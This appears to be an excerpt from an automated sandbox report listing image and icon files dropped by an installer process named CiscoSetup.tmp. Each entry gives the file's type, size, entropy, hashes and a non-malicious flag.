                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                                                                                  MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                                                                                  SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                                                                                  SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                                                                                  SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                                                                                  MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                                                                                  SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                                                                                  SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                                                                                  SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                                                                                  MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                                                                                  SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                                                                                  SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                                                                                  SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                                                                                  MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                                                                                  SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                                                                                  SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                                                                                  SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
